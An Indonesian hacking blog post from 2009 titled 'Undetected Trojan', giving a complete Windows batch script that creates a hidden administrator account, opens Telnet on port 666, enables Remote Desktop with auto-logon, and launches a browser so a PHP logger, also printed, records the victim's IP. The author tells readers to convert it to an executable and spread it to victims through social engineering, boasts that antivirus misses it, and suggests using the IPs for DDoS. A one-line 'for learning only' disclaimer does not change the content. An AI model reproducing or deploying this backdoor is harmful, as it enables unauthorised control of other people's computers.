..::| Including Techno |::..
iMenu
Find...
iCategory
News [3]
Berita terkini ...
Tutorial [7]
all about tutorial...
Software [2]
all about software...
Hacking [2]
all about hacking stuff here...
Virus [1]
all about virus and how to solve...
Opini [4]
Opini dari saya...
Humor [2]
penghilang stress....
iCalender
«  July 2009  »
SuMoTuWeThFrSa
   1234
567891011
12131415161718
19202122232425
262728293031
iTranslate


Google PageRank Checker

iGo ...
Internet Sehat

Internet Sehat

Komunitas Blogger Indonesia

balaibahasabandung.web.id

iFriend
Blog - Uchyha

Main » 2009 » July » 19 » Trojan Tidak Terdeteksi
Trojan Tidak Terdeteksi
9:13 AM
Pendahuluan...

Trojan horse atau Kuda Troya, dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan
Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut: Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash. Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.

Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse. OK gw kira itu saja pendahuluan kita...



Sekarang di sini kita mempunyai sebuah script dari bat yang gunanya untuk membuka port dan bisa untuk melakukan remote melewati telnet dan melakukan ShutDown secara remote, sama hal nya seperti trojan :

===============================================================
@echo off
net user coba /add /expires:never
net localgroup administrators coba /add
echo Windows Registry Editor Version 5.00> c:\winst.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\winst.reg
echo "eminem"=dword:00000000>> c:\winst.reg
REGEDIT /S c:\winst.REG
DEL c:\winst.REG

@echo off
@echo REGEDIT4>user1.reg
echo. >>user1.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>user1.reg
echo. >>user1.reg
echo "ErrorControl"=dword:00000001>>user1.reg
echo "Start"=dword:00000002>>user1.reg
echo "Type"=dword:00000010>>user1.reg

@echo off
echo "FailureActions&
quot;=hex#58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>user1.reg
echo. >>user1.reg
echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>user1.reg
echo. >>user1.reg
echo "NTLM"=dword:00000001>>user1.reg
echo "TelnetPort"=dword:29A>>user1.reg
echo off
regedit /s user1.reg
echo off
del user1.reg

@echo off
echo Windows Registry Editor Version 5.00> c:\TES.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TES.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TES.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TES.reg
regedit /s c:\TES.reg
del c:\TES.reg

@echo off
echo Windows Registry Editor Version 5.00> c:\TES2.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>
c:\TES2.reg
echo "Start"=dword:00000002>> c:\TES2.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>> c:\TES2.reg
echo "AllowTSConnections"=dword:00000001>> c:\TES2.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TES2.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TES2.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>> c:\TES2.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TES2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon]>> c:\TES2.reg
echo "AutoAdminLogon"="1">> c:\TES2.reg
REGEDIT /S C:\TES2.REG
REGEDIT -S C:\TES2.REG

echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL c:\TS2.REG
DEL c:\bootlog~.txt
@start /b "iexplore.exe" www.google.com
Exit

====================================================================
Perhatikan pada bagian berikut ini

net user coba /add /expires:never

net localgroup administrators coba /add

akan menambahkan user "coba" di

echo "TelnetPort"=dword:29A>>user1.reg


dan akan membuka telnet port 666 [karena 29A adalah hasil hex dari 666]
untuk merubahnya anda bisa mencoba menggunakan calculator lewat Run – Calc
Lihat gambar di bawah ini :

Calc1

Cukup merubah Dec ke Hex...




Dan pada bagian : @start /b "iexplore.exe" www.google.com

Apabila victim mengklik file bat ini akan membuka www.google.com yang gunanya untuk merecord IP sang victim dan bisa digunakan untuk serangan DDoS. Source Record Ip kira-kira seperti ini.



======================================================================
$logfile= 'record.html';
$IP = $_SERVER['REMOTE_ADDR'];
$logdetails= date("F j, Y, g:i a") . ': ' . ''.$_SERVER['REMOTE_ADDR'].'>'.$_SERVER['REMOTE_ADDR'].'';
$fp = fopen($logfile, "a");
fwrite($fp, $logdetails);
fwrite($fp, "
");
fclose($fp);
?>

======================================================================

Nah... sekarang kita mulai cara membuatnya, copy paste source code pertama kedalam notepad dan save dengan ekstensi bat [jangan lupa edit bagian2 pentingnya saja seperti user , port , rec IP]. Anda bisa merubahnya dengan exstensi exe menggunakan tools seperti bat2exe yang bisa di download di http://www.battoexe.com ]

Setelah itu silakan anda sebarkan file bat atau exe tadi di mana saja atau anda bisa melakukan percobaan dengan teman anda , tapi tentunya menggunakan teknik SKSD, hehehe dan yang lebih asiknya tidak satupun AntiVirus pun berhasil membacanya sebagai malicious code . setelah itu anda hanya perlu mengecek site record IP yang anda buat tadi dan anda bisa meremote melalui telnet dengan port 666 ( saya pernah mencobanya dengan Remote Desktop dan berhasil )

Nah... itulah tadi tutorial dari saya semoga bermanfaat buat pembaca sekalian


Disclaimer : Gunakan source code diatas hanya untuk sarana pembelajaran dan tidak untuk disalahgunakan dimasa mendatang.



Greets : eminem
Thanks to HC, CyberDos, JatimCrew and Teh_Godfather
Written by h4ck_Z

Category: Virus | Views: 1920 | Added by: trieari | Tags: Trojan, Hacking, virus | Rating: 5.0/1 |
Total comments: 5
5 AbessyveF  
0
membaca seluruh blog, cukup bagus

4 Ivan Jaya  
0
Bagaimana dengan screen capture..? Bisa juga gak bro..?

3 admin  
0
asdasda

2 admin  
0
angry biggrin cool happy dry cry sad smile surprised wink wacko tongue
tezt......

1 trieari  
0

Only registered users can add comments.
[ Registration | Login ]
QuickContact

saya sedang
Entries archive
iPoll
Bagaimana tentang web baru saya?
Total of answers: 20
iShout


iStats


..::|Including Techno | WYSIWYGYour IP is 3.136.22.204|::..